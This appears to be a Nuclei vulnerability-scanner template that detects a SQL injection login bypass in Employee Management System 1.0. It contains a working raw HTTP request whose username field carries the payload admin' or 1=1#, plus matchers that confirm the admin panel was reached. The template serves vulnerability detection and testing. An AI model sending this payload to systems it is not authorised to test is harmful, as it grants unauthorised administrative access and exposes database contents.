id: ems-sqli

info:
  name: Employee Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Employee Management System 1.0 contains a SQL injection vulnerability via the username parameter.  An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/48882
    - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: ems,sqli,cms,auth-bypass,edb

http:
  - raw:
      - |
        POST /process/aprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mailuid=admin' or 1=1#&pwd={{rand_base(5)}}&login-submit=Login

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Admin Panel'
          - 'Log Out'
          - 'Employee Management System'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ddfa2c7b74f75ab6d4215f46a731b771b08428ad4b98f0ac56882c7111c08ba4022007cb766fa590a6548f11cf42ec331e9b051786d2c40bc6917416dddb611de521:922c64590222798bb761d5b6d8e72950